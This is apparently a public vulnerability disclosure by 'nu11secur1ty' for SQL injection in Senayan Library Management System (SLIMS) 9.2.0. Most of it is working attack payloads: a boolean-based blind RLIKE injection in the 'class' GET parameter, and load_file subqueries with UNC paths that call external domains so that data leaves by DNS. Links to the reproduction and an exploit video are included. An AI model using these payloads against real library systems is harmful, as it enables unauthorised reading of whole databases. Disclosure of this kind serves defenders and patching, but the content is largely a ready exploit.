Senayan Library Management System 9.2.0 SQL Injection

## Title: Senayan Library Management System v9.2.0 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 12.19.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.0## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0/SQLi## Description:The manual insertion `point 5` appears to be vulnerable to SQLinjection attacks. The payload '+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.com\\dzd'))+'was submitted in the manual insertion `point 5`.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take information from all database columns of thissystem by using this vulnerability.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: reportView=true&year=2002&class=bbbb'+(selectload_file('\\\\716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.id\\nbq'))+''RLIKE (SELECT (CASE WHEN (8839=8839) THEN 0x62626262+(selectload_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+''ELSE 0x28 END)) AND'IzAa'='IzAa&membershipType=a''&collType=aaaa'+(selectload_file('\\\\dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.id\\wtf'))+''+(selectload_file('\\\\azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id\\dzd'))+'---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.0/SQLi)## Proof and Exploit:[href](https://streamable.com/jy5pql)## Time spent`00:10:00`## Writing an exploit`00:05:00`